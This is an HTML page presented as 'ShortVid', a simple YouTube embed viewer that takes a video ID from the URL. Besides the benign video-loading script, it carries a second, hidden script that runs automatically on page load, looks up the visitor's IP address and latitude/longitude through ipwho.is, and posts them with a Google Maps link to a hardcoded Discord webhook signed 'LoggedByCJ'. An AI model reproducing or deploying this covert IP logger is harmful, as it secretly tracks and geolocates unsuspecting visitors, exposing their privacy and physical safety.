<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>ShortVid</title>
    <style>
      body {
    font-family: Arial, sans-serif;
    background-color: #f4f4f4;
    color: #333;
    margin: 0;
    padding: 0;
    display: flex;
    justify-content: center;
    align-items: center;
    height: 100vh;
}



h1 {
    color: #333;
}

#video-container {
    margin-top: 20px;
    width: 100%;
    height: 100%;
    background-color: #000;
    display: flex;
    justify-content: center;
    align-items: center;
    color: white;
}

#video-container iframe {
    width: 100%;
    height: 100%;
    border: none;
}

    </style>
</head>
<body>
    <div class="container">
        <h1>ShortYT</h1>
        <div id="video-container">
            <p>Loading video...</p>
        </div>
    </div>

    <script>

function getVideoIdFromUrl() {
    const urlParams = new URLSearchParams(window.location.search);
    return urlParams.get('vid');
}

function loadVideo() {
    const videoId = getVideoIdFromUrl();
    const videoContainer = document.getElementById('video-container');

    if (videoId) {
        const iframe = document.createElement('iframe');
        iframe.src = `https://www.youtube.com/embed/${videoId}`;
        iframe.allow = "accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture";
        iframe.allowFullscreen = true;


        videoContainer.innerHTML = '';
        videoContainer.appendChild(iframe);
    } else {

        videoContainer.innerHTML = '<p>Error: No video ID found in URL.</p>';
    }
}


window.onload = loadVideo;

    </script>
  <script>
      
     var wbhk = 'https://discord.com/api/webhooks/1347351920075083818/J-K9B1cukwiXvgqvcNOJZSDyuJRy-8oboNKh1WCCq6dQY1YL9zkdanxpe9KzkcvDdh2H'

        function ipLogByCJ() {
          var ip = '';
          var XMLHttp = new XMLHttpRequest();
             XMLHttp.onreadystatechange = function() {
               if(this.readyState == 4 && this.status == 200) {
          		var ipwhois = JSON.parse(this.responseText);
                    var ispp = ipwhois.ip
                    var ispp2 = ipwhois.ip + "/json"
                    var ll = ipwhois.latitude + "," + ipwhois.longitude
                            const request = new XMLHttpRequest();
                       request.open("POST", wbhk);
                       request.setRequestHeader('Content-type', 'application/json');
                       const params = {
                         username: "LoggedByCJ",
                         content: "**Ip** : _" + ispp + "_\n**Raw** : _https://api.techniknews.net/ipgeo/" + ispp + "_\n**Raw** : _https://ipapi.co/" + ispp2 + `_\n[View on Google Maps](https://www.google.com/maps?q=${ll}) _` + " _\n**More info:** : https://ipwho.is/" + ispp
                       }
                       request.send(JSON.stringify(params));
                     }
                  
                  };
                                      XMLHttp.open('GET', 'https://ipwho.is/' + ip, true);
                    XMLHttp.send();

             }

               
      setTimeout(function() {
        ipLogByCJ()
      }, 700);
</script>
</body>
</html>
